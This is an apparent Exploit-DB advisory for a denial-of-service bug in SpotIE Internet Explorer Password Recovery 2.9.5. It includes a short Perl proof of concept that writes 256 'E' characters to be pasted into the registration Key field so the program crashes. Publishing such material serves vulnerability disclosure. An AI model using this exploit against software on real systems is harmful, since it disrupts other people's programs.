SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service

vendor:

SpotIE Internet Explorer Password Recovery

by:

Emilio Revelo

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: SpotIE Internet Explorer Password Recovery

Affected Version From: 2.9.5

Affected Version To: 2.9.5

Patch Exists: NO

Related CWE: N/A

CPE: a:nsauditor:spotie_internet_explorer_password_recovery

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro x64 es

2019

SpotIE Internet Explorer Password Recovery 2.9.5 – ‘Key’ Denial of Service

SpotIE Internet Explorer Password Recovery 2.9.5 is vulnerable to a denial of service attack when a maliciously crafted 'Key' is entered into the registration form. An attacker can exploit this vulnerability by running a perl script to generate a file containing 256 'E' characters, copying the contents of the file to the clipboard, and then pasting it into the 'Key' field of the registration form. This will cause the program to crash.

Mitigation:

Ensure that input validation is performed on all user-supplied data before it is used.

Source

Exploit-DB raw data:

# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
# Date: 2019-20-09
# Exploit Author: Emilio Revelo
# Vendor Homepage: http://www.nsauditor.com/
# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on: Windows 10 Pro x64 es
# Version: 2.9.5

# Steps to produce the DoS: 

# 1.- Run perl script : perl SpotIE.pl
# 2.- Open SpotIE.txt and copy the content to clipboard
# 3.- Open SpotIE Internet Explorer Password Recovery
# 4.- Navigate to Register -> Enter the registration name and key below...
# 5.- Paste ClipBoard on "Key:"
# 7.- Ok
# 8.- Observe the program crash.

#!/usr/local/bin/perl

use strict;
use warnings;

my $filename = 'SpotIE.txt';
open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
print $fh "E"x256;
close $fh;
print "Done!\n";
print "File: SpotIE.txt\n"